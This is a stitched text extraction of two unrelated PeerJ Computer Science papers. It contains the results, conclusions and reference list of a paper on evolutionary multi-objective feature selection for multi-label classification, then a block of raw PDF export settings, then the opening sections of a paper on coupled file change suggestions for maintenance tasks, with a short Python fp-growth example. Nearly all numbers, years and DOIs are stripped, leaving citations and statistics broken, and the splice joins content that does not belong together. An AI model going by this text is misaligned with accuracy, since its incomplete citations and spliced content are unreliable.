the comparison between the best pareto fronts obtained by the different methods on the training and test sets is shown in figs. and . the proposed method has a better pareto front on most of the datasets in terms of both the number of features and the classification performance, and the diversity of the obtained solutions is one of the properties of its pareto front. on datasets such as genbase, the proposed method has a better pareto front than the other methods, meaning that, with equal numbers of features, it achieves a lower hamming loss. on some datasets, such as birds, emotions, and enron, the pareto front obtained by the pso-based method performs better than the proposed method only in a few regions (mostly in the middle part of the pareto front); however, the two-set coverage of the proposed method is higher on most of the datasets, according to the pareto fronts. based on the comparison of the hypervolume indicator, it is evident that wider pareto fronts lead to higher hypervolume values on all datasets.
furthermore, the proposed algorithm performs considerably better than the nsga-ii algorithm on all datasets, and, as discussed previously, all the solutions of nsga-ii are dominated by the proposed method. nsga-ii has a smaller pareto front than the other methods; this algorithm could find only a small number of solutions in the search space. regarding the comparison between the proposed method and the original version of moea/d, as presented in the plots, the proposed method obtains a wider pareto front with more non-dominated solutions. on most of the datasets, the moea/d pareto front lies between the nsga-ii and pso fronts (i.e., better than nsga-ii but worse than pso), while the proposed method dominates most of the solutions obtained by those methods. this means that the modifications to the original algorithm have improved the multi-objective search process: the local search strategy finds better solutions in terms of dominance, whereas the moea/d algorithm does not use the dominance concept to select the best solutions. therefore, a combination of decomposition and dominance can find more promising regions in the search space, which improves the exploitation power of the algorithm. on the other hand, applying a combination of crossover operators increases the exploration power of the search algorithm.

table . comparison on the hypervolume indicator of the training and test pareto fronts (mean, median, and standard deviation per dataset) for the proposed, pso-based, nsga-ii, and moea/d methods; highlighted numbers indicate which method reaches the higher hypervolume indicator on each dataset, and the last row reports w/t/l.

table . ranks of the feature selection methods according to the friedman test on the two-set coverage and hypervolume indicators; highlighted numbers indicate which method reaches the best rank.

[figure: pareto fronts on the training data (number of features vs. hamming loss) for the nsga-ii, moea/d, pso-based, and proposed methods, including (a) emotions, (b) scene, (c) yeast, (d) birds, (e) enron, and (f) flags.]

[figure: pareto fronts on the test data (number of features vs. hamming loss) for the nsga-ii, moea/d, pso-based, and proposed methods, including (a) emotions, (b) scene, (c) yeast, (d) birds, (e) enron, and (f) flags.]

another advantage of the pareto front obtained by the proposed algorithm is its ability to search in the region of solutions with a low number of features, whereas the other two methods did not obtain such solutions. this issue is most prominent for the nsga-ii algorithm, whose solutions were not as successful as those of the other two methods in decreasing the number of features; the number of features selected by the proposed method is usually smaller than those obtained by the pso-based and nsga-ii methods. as concluded from the experiments, the proposed method can find a set of feature subsets that can be used in multi-label classification tasks. in every multi-label classification problem, such as all the applications examined in this paper, the best features need to be selected; therefore, based on mcdm, a set of features can be selected from the subsets on the pareto front to improve the performance of the classification.

concluding remarks

many real-world applications require multi-label classification, and when more than one label exists, feature selection plays a significant role in the performance of the multi-label classifier. the main purpose of this paper is to propose a decomposition-based evolutionary multi-objective method for selecting optimal features in multi-label data. the multi-objective search space is divided into several scalar subproblems so that each subproblem can be solved using evolutionary algorithms; this yields a more effective search process and improves the quality of the obtained solutions. to increase the efficiency of the proposed method, a local search is used, which gives more exploitation power for finding better feature subsets. in addition, a combination of various crossover operators results in more diverse solutions.
the results indicate that this method achieves a better pareto front in most of the standard multi-label datasets compared to the other methods in terms of both the number of features and the classification performance. furthermore, the progress of the results in other evaluation criteria, such as the -set coverage and hypervolume indicator, represents a considerable performance improvement of the proposed method compared to the previous methods. despite the satisfactory performance of the proposed method, several points are considered for future investigations. the efficiency of the proposed algorithm can be examined in more problems, especially in more real-world applications. in the present study, only two objectives were evaluated. additional objective functions may be considered in future work. moreover, the proposed method uses continuous genetic operators, which can be replaced with binary operators to improve the performance. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ author contributions azam asilian bidgoli conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. hossein ebrahimpour-komleh conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. shahryar rahnamayan conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and code are available in the supplemental files. our experimental data are multi- label classification datasets taken from mulan library: http://mulan.sourceforge.net/datasets-mlc.html. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references akkan c, gülcü a. . a bi-criteria hybrid genetic algorithm with robustness objective for the course timetabling problem. computers & operations research : – doi . /j.cor. . . . auger a, bader j, brockhoff d, zitzler e. . theory of the hypervolume indicator: optimal μ- distributions and the choice of the reference point. in: proceedings of the th acm sigevo workshop on foundations of genetic algorithms. new york, ny: acm, – . bidgoli aa, rahnamayan s, mahdavi s, deb k. . a novel pareto-vikor index for ranking scientists’ publication impacts: a case study on evolutionary computation researchers. in: ieee congress on evolutionary computation (cec), ieee, wellington, new zealand. – . blum al, langley p. . selection of relevant features and examples in machine learning. artificial intelligence ( ): – doi . /s - ( ) - . boutell mr, luo j, shen x, brown cm. . learning multi-label scene classification. pattern recognition ( ): – doi . /j.patcog. . . . briggs f, huang y, raich r, eftaxias k, lei z, cukierski w, hadley sf, hadley a, betts m, fern xz. . the th annual mlsp competition: new methods for acoustic classification of multiple simultaneous bird species in a noisy environment. 
in: international workshop on machine learning for signal processing (mlsp), ieee, southampton, uk. – . calzada-ledesma v, puga-soberanes hj, ornelas-rodríguez m, rojas-domínguez a, carpio- valadez jm, espinal a, soria-alcaraz ja, sotelo-figueroa ma. . evolutionary design of problem-adapted image descriptors for texture classification. ieee access : – doi . /access. . . chandrashekar g, sahin f. . a survey on feature selection methods. computers & electrical engineering ( ): – doi . /j.compeleceng. . . . asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://mulan.sourceforge.net/datasets-mlc.html http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.compeleceng. . . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. das i, dennis je. . normal-boundary intersection: a new method for generating the pareto surface in nonlinear multicriteria optimization problems. siam journal on optimization ( ): – doi . /s . deb k, agrawal s, pratap a, meyarivan t. . a fast elitist non-dominated sorting genetic algorithm for multi-objective optimization: nsga-ii. ppsn : – . dembczynski k, waegeman w, cheng w, hullermeier e. . on label dependence and loss minimization in multi-label classification. machine learning ( – ): – doi . /s - - - . dendamrongvit s, vateekul p, kubat m. . irrelevant attributes and imbalanced classes in multi-label text-categorization domains. intelligent data analysis ( ): – doi . /ida- - . dheeru d, karra taniskidou e. . uci machine learning repository. irvine: university of california, school of information and computer science. diplaris s, tsoumakas g, mitkas pa, vlahavas i. . protein classification with multiple algorithms. in: panhellenic conference on informatics. berlin: springer, – . el aziz ma, hassanien ae. . modified cuckoo search algorithm with rough sets for feature selection. neural computing and applications ( ): – doi . /s - - - . elaziz ma, ewees aa, ibrahim ra, lu s. . opposition-based moth-flame optimization improved by differential evolution for feature selection. mathematics and computers in simulation : – doi . /j.matcom. . . . elaziz mea, ewees aa, oliva d, duan p, xiong s. . a hybrid method of sine cosine algorithm and differential evolution for feature selection. in: international conference on neural information processing. cham: springer, – . elisseeff a, weston j. . a kernel method for multi-labelled classification. in: advances in neural information processing systems. – . ibrahim ra, elaziz ma, oliva d, cuevas e, lu s. a. an opposition-based social spider optimization for feature selection. soft computing ( ): – doi . /s - - -x. ibrahim ra, ewees aa, oliva d, elaziz ma, lu s. b. improved salp swarm algorithm based on particle swarm optimization for feature selection. journal of ambient intelligence and humanized computing ( ): – doi . /s - - - . jaszkiewicz a. . on the performance of multiple-objective genetic local search on the / knapsack problem-a comparative experiment. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . jiang s, cai z, zhang j, ong y-s. . multiobjective optimization by decomposition with pareto-adaptive weight vectors. in: seventh international conference on natural computation (icnc). vol. . 
shanghai: ieee, – . jungjit s, freitas a. . a lexicographic multi-objective genetic algorithm for multi-label correlation based feature selection. in: proceedings of the companion publication of the annual conference on genetic and evolutionary computation. new york, ny: acm, – . kashef s, nezamabadi-pour h. . a label-specific multi-label feature selection algorithm based on the pareto dominance concept. pattern recognition : – doi . /j.patcog. . . . klimt b, yang y. . the enron corpus: a new dataset for email classification research. in: boulicaut jf, esposito f, giannotti f, pedreschi d, eds. machine learning: ecml . berlin: springer, – . asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ida- - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.matcom. . . http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tevc. . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ konak a, coit dw, smith ae. . multi-objective optimization using genetic algorithms: a tutorial. reliability engineering & system safety ( ): – doi . /j.ress. . . . lee j, kim d-w. . memetic feature selection algorithm for multi-label classification. information sciences : – doi . /j.ins. . . . lee j, seo w, kim d-w. . effective evolutionary multilabel feature selection under a budget constraint. complexity : – doi . / / . li f, miao d, pedrycz w. . granular multi-label feature selection based on mutual information. pattern recognition : – doi . /j.patcog. . . . lin y, hu q, liu j, chen j, duan j. . multi-label feature selection based on neighborhood mutual information. applied soft computing : – doi . /j.asoc. . . . madjarov g, kocev d, gjorgjevikj d, dzeroski s. . an extensive experimental comparison of methods for multi-label learning. pattern recognition ( ): – doi . /j.patcog. . . . mirjalili s, saremi s, mirjalili sm, coelho ld s. . multi-objective grey wolf optimizer: a novel algorithm for multi-criterion optimization. expert systems with applications : – doi . /j.eswa. . . . mousavirad s, ebrahimpour-komleh h. . wrapper feature selection using discrete cuckoo optimization algorithm. international journal of mechatronics, electrical and computer technology ( ): – . pereira rb, plastino a, zadrozny b, merschmann lh. . categorizing feature selection methods for multi-label classification. artificial intelligence review ( ): – doi . /s - - - . pestian jp, brew c, matykiewicz p, hovermale dj, johnson n, cohen kb, duch w. . a shared task involving multi-label classification of clinical free text. in: proceedings of the workshop on bionlp : biological, translational, and clinical language processing. stroudsburg, pa: association for computational linguistics, – . price k, storn rm, lampinen ja. . differential evolution: a practical approach to global optimization. berlin: springer science & business media. reyes o, morell c, ventura s. . evolutionary feature weighting to improve the performance of multi-label lazy algorithms. integrated computer-aided engineering ( ): – doi . /ica- . reyes o, morell c, ventura s. . scalable extensions of the relieff algorithm for weighting and selecting features on the multi-label learning context. neurocomputing : – doi . /j.neucom. . . . safavian sr, landgrebe d. . a survey of decision tree classifier methodology. ieee transactions on systems, man, and cybernetics ( ): – doi . / . . shao h, li gz, liu gp, wang yq. 
. symptom selection for multi-label data of inquiry diagnosis in traditional chinese medicine. science china information sciences ( ): – doi . /s - - - . spolaôr n, cherman ea, monard mc, lee hd. a. a comparison of multi-label feature selection methods using the problem transformation approach. electronic notes in theoretical computer science : – doi . /j.entcs. . . . spolaôr n, cherman ea, monard mc, lee hd. b. relieff for multi-label feature selection. in: brazilian conference on intelligent systems (bracis). fortaleza: ieee, – . asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.ress. . . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . / / http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /j.asoc. . . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ica- http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.entcs. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ trivedi a, srinivasan d, sanyal k, ghosh a. . a survey of multiobjective evolutionary algorithms based on decomposition. ieee transactions on evolutionary computation ( ): – . trohidis k, tsoumakas g, kalliris g, vlahavas ip. . multi-label classification of music into emotions. ismir : – . tsoumakas g, spyromitros-xioufis e, vilcek j, vlahavas i. . mulan: a java library for multi- label learning. journal of machine learning research (july): – . ueda n, saito k. . parametric mixture models for multi-labeled text. advances in neural information processing systems : – . velasquez m, hester pt. . an analysis of multi-criteria decision making methods. international journal of operations research ( ): – . wandekokem e, varejão f, rauber t. . an overproduce-and-choose strategy to create classifier ensembles with tuned svm parameters applied to real-world fault diagnosis. in: bloch i, cesar rm, eds. progress in pattern recognition, image analysis, computer vision, and applications. berlin: springer, – . xue b, zhang m, browne wn. . particle swarm optimization for feature selection in classification: a multi-objective approach. ieee transactions on cybernetics ( ): – doi . /tsmcb. . . yin j, tao t, xu j. . a multi-label feature selection algorithm based on multi-objective optimization. in: international joint conference on neural networks (ijcnn). killarney: ieee, – . zhang m-l, pena jm, robles v. . feature selection for multi-label naive bayes classification. information sciences ( ): – doi . /j.ins. . . . zhang m-l, zhou z-h. . ml-knn: a lazy learning approach to multi-label learning. pattern recognition ( ): – doi . /j.patcog. . . . zhang m-l, zhou z-h. . a review on multi-label learning algorithms. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . zhang q, li h. . moea/d: a multiobjective evolutionary algorithm based on decomposition. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . zhang y, gong d-w, rong m. . multi-objective differential evolution algorithm for multi- label feature selection in classification. in: proceedings, part i, of the th international conference on advances in swarm and computational intelligence. vol. . new york: springer-verlag new york, inc, – . zhang y, gong d-w, sun x-y, guo y-n. . a pso-based multi-objective multi-label feature selection method in classification. scientific reports ( ): doi . /s - - - . zitzler e, thiele l. . 
multiobjective optimization using evolutionary algorithms—a comparative case study. in: international conference on parallel problem solving from nature. berlin: springer.
/encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . 
are suggestions from coupled file changes useful for perfective maintenance tasks? jasmin ramadani and stefan wagner, institute of software technology, university of stuttgart, stuttgart, germany. submitted january, accepted september, published october. corresponding author: jasmin ramadani, jasmin.ramadani@informatik.uni-stuttgart.de. academic editor: ahmed hassan. additional information and declarations can be found on page . doi . /peerj-cs. copyright ramadani and wagner, distributed under creative commons cc-by. open access. how to cite this article: ramadani and wagner ( ), are suggestions from coupled file changes useful for perfective maintenance tasks? peerj comput. sci. :e ; doi . /peerj-cs.

abstract background. software maintenance is an important activity in the development process, during which maintenance team members leave and new members join over time. the identification of files which are frequently changed together has been proposed several times. yet, existing studies about coupled file changes ignore developer feedback as well as the impact of these changes on maintenance performance, relying instead on analysis findings and expert evaluation. methods. we investigate the usefulness of coupled file changes during perfective maintenance tasks when developers are inexperienced in programming or new on the project. using data mining on software repositories, we identify files that were changed together most frequently in the past. we extract coupled file changes from the git repository of a java software system and join them with corresponding attributes from the versioning system, the issue tracking system and the project documentation. we present a controlled experiment involving student participants in which we investigate whether coupled file change suggestions influence the correctness of the task solutions and the time required to complete them. results. the results show that the use of coupled file change suggestions significantly increases the correctness of the solutions. however, there is only a minor effect on the time required to complete the perfective maintenance tasks. we also derived a set of the most useful attributes based on the developers' feedback. discussion. coupled file changes and a limited number of the proposed attributes are useful for inexperienced developers working on perfective maintenance tasks: although the developers using these suggestions solved more tasks, they still needed time to understand and organize this information. subjects data science, software engineering. keywords data mining, software repositories, coupled changes, git.

introduction software maintenance represents a very important part of software product development (abran & nguyenkim, ). maintenance is often performed by maintenance programmers. over time, teams change as members leave and others join (hutton & welland, ). new members cannot be productive on maintenance tasks immediately, so they need some support to perform their tasks successfully. perfective maintenance tasks represent changes dealing with new or modified user requirements (stafford, ). they are related to activities which increase the performance of
the system or enhance its user interface (van vliet, van vliet & van vliet, ). lientz & swanson ( ) reported that more than % of software maintenance efforts are of a perfective nature. software development produces large amounts of data which are stored in software repositories. these repositories contain the artifacts developed during software evolution. after some time, this data becomes a valuable information source for solving maintenance tasks. one of the most widely used techniques for analyzing software repositories is data mining. the term mining software repositories (msr) describes investigations of software repositories using data mining (hassan, ). couplings have been defined as "the measure of the strength of an association established by a connection from one module to another" (stevens, myers & constantine, ). change couplings are also described as files having the same commit time, author and modification description (gall, jazayeri & krajewski, ). knowing which files were frequently changed together can support developers in dealing with the large amount of information about the software product, especially if the developer is new on the project, if the project started a long time ago, or if the developer does not have significant experience in software development.

problem statement. several researchers have proposed approaches for identifying coupled file changes to give recommendations to developers (bavota et al., ; kagdi, yusuf & maletic, ; ying et al., ; zimmermann et al., ; hassan & holt, ). existing studies, however, focus on the presentation of the mining results and expert investigations, and they neglect the feedback of developers on the findings as well as the impact of coupled changes on maintenance tasks.

research objectives. the overall aim of our research is to investigate the usefulness of coupled file change suggestions in supporting developers who are inexperienced, new on the project or supposed to work on unfamiliar parts of the project. we provide suggestions for likely changes so that we can explore how useful the suggestions are for the developers. we identify couplings of files that are frequently changed together based on the information gathered from the software project repository. we use the version control system, the issue tracking system and the project documentation archives as data sources for additional attributes. we join this additional information to the coupled changes that we discover to build the suggestions. the usefulness of coupled file changes is determined by analyzing their influence on the correctness of the solutions and the time required for solving maintenance tasks.

contribution. we present a controlled experiment on the usefulness of coupled change suggestions in which each of the participants tries to solve four different perfective maintenance tasks and reports their feedback on the usefulness of the repository attributes.
related work many studies have been dedicated to investigating software repositories to find logically coupled changes, e.g., bieman, andrews & yang ( ); fluri, gall & pinzger ( ); gall, hajek & jazayeri ( ). we identify two granularity levels, the first one investigates the couplings based on a file level (kagdi, yusuf & maletic, ; ying et al., ) and the second scenario examines coupled changes identified between parts of files like classes, methods or modules (fluri, gall & pinzger, ; kagdi, ; zimmermann et al., ; zimmermann et al., ; hassan & holt, ). in our study, we use coupled file change on a file level. the majority of the studies dealing with identifying coupled changes use some kind of data mining for this purpose (german, ; hattori et al., ; kagdi, yusuf & maletic, ; shirabad, lethbridge & matwin, ; van rysselberghe & demeyer, ; ying et al., ; zimmermann et al., ). especially the association rules technique is often used to identify frequent changes (kagdi, yusuf & maletic, ; ying et al., ; zimmermann et al., ). this data mining technique uses various algorithms to determine the frequency of these changes. most of the studies employ the apriori algorithm (kagdi, yusuf & maletic, ; zimmermann et al., ). however, other faster algorithms like the fp-growth algorithm are also in use (ying et al., ). we generate the coupled file changes using the frequent item sets analysis and the fp-growth algorithm. most of the studies use a single data source where some kind of version control system is investigated, typically cvs or subversion. there are few studies which investigate a git version control system (bird et al., ; carlsson, ). other studies combine more than one data source to be investigated, like the version control system and an issue tracking system (canfora & cerulo, ; d’ambros, lanza & robbes, ; fischer, pinzger & gall, ; wu et al., ) where the data extracted from these two sources is analyzed and the link between the changed files and issues is determined. we use three different sources for the additional attributes: the git versioning history, the jira issue tracking system and the software documentation. to the best of our knowledge, there are few studies investigating how couplings align with developers’ opinion or feedback. coupling metrics on structural and semantic levels are investigated in revelle, gethers & poshyvanyk ( ). the developers were asked if they find these metrics to be useful. they show that feature couplings on a higher level of abstraction than classes are useful. the developers’ perceptions of software couplings are investigated in bavota et al. ( ). here the authors examine how class couplings captured by different coupling measures like semantic, logical and others align with the developers’ perception of couplings. the interestingness of coupled changes is also studied in ying et al. ( ). this study defines a categorization of coupled changes interestingness according to the source code changes. in ramadani & wagner ( ), the feedback on the interestingness of coupled file changes and attributes from the software repository was investigated. in our experiment we extend the findings of this case study and investigate the usefulness of coupled file changes and the corresponding attributes. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
the categorization of changes of a software product related to the maintenance task categories defined in swanson ( ) has been previously investigated (hindle, german & holt, ; purushothaman & perry, ). the authors in purushothaman & perry ( ) classified small changes based on their purpose and implementation. the changes on the software in large commits have been categorized in hindle, german & holt ( ). they define categories to identify the types of the addressed issues and the types of the changes in large commits. similarly, we classify the issues related to the changes on the system based on the defined maintenance categories. furthermore, we classify the changes on the system based on the most involved functionalities. various experiments involving maintenance tasks have been described in the literature. nguyen, boehm & danphitsanuphan ( ) deal with assessing and estimating software maintenance tasks. de lucia, pompella & stefanucci ( ) investigate the effort estimation for corrective software maintenance. ricca et al. ( ) perform an experiment on maintenance in the context of model-driven development. chan ( ) investigates the impact of programming and application-specific knowledge on maintenance effort. in our experiment, we explore how the coupled file change suggestions influence the correctness of performing maintenance tasks and the time required to solve these tasks. background software maintenance software maintenance includes program or documentation changes to make the software system perform correctly or more efficiently (shelly, cashman & rosenblatt, ). software maintenance has been defined in the ieee standard for software maintenance (ieee, ) to be a software product modification after delivery to remove faults, improve performance or adapt the environment. in the iso/iec life cycle processes standard (iso/iec, ), maintenance is described as the process where code or documentation modifications are performed due to some problem or improvement. maintenance categories swanson ( ) defined three different categories of maintenance: corrective, adaptive and perfective maintenance. the iso/iec international standard for software maintenance (iso/iec, ) updates this list with a fourth category, preventive maintenance, so we have the following maintenance categories (pigoski, ): • corrective maintenance: this type of maintenance tasks includes corrections of errors in systems. software product modifications are performed to correct the discovered problems. it corrects design, source code and implementation errors. • adaptive maintenance: this involves changes in the environment and includes adding new features or functions to the system. software product modifications are performed to ensure software product usability in a changed environment. • perfective maintenance: this involves changes in the system which influence its efficiency. it also includes software product modifications to improve maintainability or performance. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • preventive maintenance: here, the changes to the system are performed to reduce the possibility of system failures in the future. it includes software product modification to detect and remove failures before they materialize. data mining coupled file changes to discover coupled file changes using data mining, we introduce the data technique that we employ in our study. 
one of the most popular data mining techniques is the discovery of frequent item sets. identifying sets of items which occur together frequently in a given database is one of the most basic tasks in data mining (han, ). coupled changes describe a situation where someone changes a particular file and afterwards also changes another file. let us say that whenever the developer changes file f1, he or she frequently also changes file f2. by investigating the transactions of changed files in the version control system commits, we identify sets of files that are changed together. let us have three transactions t1, t2 and t3, each consisting of four changed files, in all of which the files f1 and f2 appear. from these three transactions, we isolate the rule that the files f1 and f2 are found together: f1 and f2 are coupled. this means that when the developers changed file f1, they also changed file f2. if these files are found together frequently, this can help other persons by suggesting that if they change f1, they should also change f2. let F = {f1, f2, ..., fd} be the set of all items (files) and T = {t1, t2, ..., tn} be the set of all transactions. as transactions, we define the commits consisting of different files. each transaction contains a subset of items from F called an item set. an important property of an item set is the support count δ, which is the number of transactions containing that item set. we call an item set frequent if its support count reaches a minimum support threshold minsup specified by the user, with minsup ≤ |F| (1).

data mining algorithm. various algorithms for mining frequent item sets and association rules have been proposed in the literature (agrawal & srikant, ; györödi & györödi, ; han, pei & yin, ). we use the fp-tree-growth algorithm to find the frequent change patterns. as opposed to the apriori algorithm (agrawal & srikant, ), which uses a bottom-up generation of frequent item set combinations, the fp-tree-growth algorithm uses partition and divide-and-conquer methods (györödi & györödi, ). this algorithm is faster and more memory-efficient than the apriori algorithm used in other studies, and it allows frequent item set discovery without candidate item set generation. (an illustrative sketch of this mining step is shown below, after the study goal.)

change grouping heuristic. there are different heuristics proposed for grouping file changes (kagdi, yusuf & maletic, ). we apply a heuristic that considers the file changes done by a single committer to be related and does not include the changes done by other committers in the same group. we use the complete version history of the project; however, based on the "developer heuristic" we group the commits performed by a single developer. from each group of these commits we extract files frequently changed together.

experimental design. in this section we define the research questions, hypotheses and metrics used in our analysis.

study goal. we use the gqm approach (basili, caldiera & rombach, ) and its medea extension (briand, morasca & basili, ) to define the study goal. the goal of our study is to analyze the usefulness of coupled file change suggestions. the objective is to compare the correctness of the solution and the time needed for a set of maintenance tasks between the group using coupled change suggestions and the group that does not use this kind of help.
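to make the mining step described above concrete, the following is a minimal, illustrative sketch of extracting coupled file changes from per-developer commit transactions with an fp-growth implementation. it is not the pipeline used in the study (the authors used the java-based spmf framework); the python mlxtend library, the file names and the support threshold are assumptions for illustration only.

```python
# illustrative sketch only: mining coupled file changes from commit transactions with
# fp-growth. the study used the java-based spmf framework; the python mlxtend library,
# the file names and the support threshold below are assumptions for illustration.
import pandas as pd
from mlxtend.preprocessing import TransactionEncoder
from mlxtend.frequent_patterns import fpgrowth

# one transaction per commit: the files changed together in that commit, already
# grouped per developer according to the "developer heuristic" described above
transactions = [
    ["ControlActionView.java", "HazardsView.java", "AccidentsView.java"],
    ["ControlActionView.java", "HazardsView.java"],
    ["ControlActionView.java", "HazardsView.java", "DesignRequirementView.java"],
    ["AccidentsView.java", "SafetyConstraintView.java"],
]

# encode the transactions as a boolean item matrix
encoder = TransactionEncoder()
item_matrix = pd.DataFrame(encoder.fit(transactions).transform(transactions),
                           columns=encoder.columns_)

# frequent item sets whose support reaches the chosen minimum threshold
frequent_sets = fpgrowth(item_matrix, min_support=0.5, use_colnames=True)

# sets with at least two files are the coupled file changes
coupled = frequent_sets[frequent_sets["itemsets"].apply(len) >= 2]
print(coupled.sort_values("support", ascending=False))
```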
the purpose is to evaluate how effective coupled file change suggestions are regarding the correctness of the modified source code and the time required to perform the maintenance tasks. the viewpoint is that of software developers and the targeted environment is open source systems.

research questions. we investigate the usefulness of coupled file change suggestions and the corresponding repository attributes. in this study, we concentrate on perfective maintenance to have a similar set of tasks. for that purpose we define the following research questions:

rq1: how useful are coupled file change suggestions in solving perfective maintenance tasks? to determine the usefulness of the coupled file changes concept, we define the following sub-questions:

rq1.1: do coupled file change suggestions influence the correctness of perfective maintenance tasks? we investigate whether there is any difference in the correctness of the maintenance task solutions between the group of developers who used coupled file change suggestions and the group not using them.

rq1.2: do coupled file change suggestions influence the time needed to solve perfective maintenance tasks? we explore whether the time that the developers need to complete the maintenance tasks differs between the group using coupled change suggestions and the group not using these suggestions. we consider two scenarios: the first one includes only the time needed to solve the tasks, the second one also includes the time needed to select relevant coupled file changes.

rq2: how useful are the attributes from the software repository in solving perfective maintenance tasks? the second research question deals with the attributes from the versioning system, the issue tracking system and the documentation. we investigate the perceived usefulness of each attribute in the proposed set to understand which attributes are good candidates to be provided to the developers.

hypotheses. we formulate the following hypotheses to answer the research questions in our study.

for rq1.1 we define the following hypotheses:
h0.1.1: there is no significant difference in the correctness of perfective maintenance task solutions between the developers using coupled file change suggestions and those not using these suggestions.
ha.1.1: there is a significant difference in the correctness of perfective maintenance task solutions between the developers who used coupled file change suggestions and those not using these suggestions.

for rq1.2 we address the following hypotheses:
h0.1.2: there is no significant difference in the time required to solve perfective maintenance tasks between the developers who used coupled file change suggestions and the developers not using these suggestions.
ha.1.2: there is a significant difference in the time required to solve perfective maintenance tasks between the developers who used coupled file change suggestions and those not using these suggestions.

to answer rq2 we formulate the following hypotheses:
h0.2: there is no significant difference in the perceived usefulness among the attributes from the software repository in the current set.
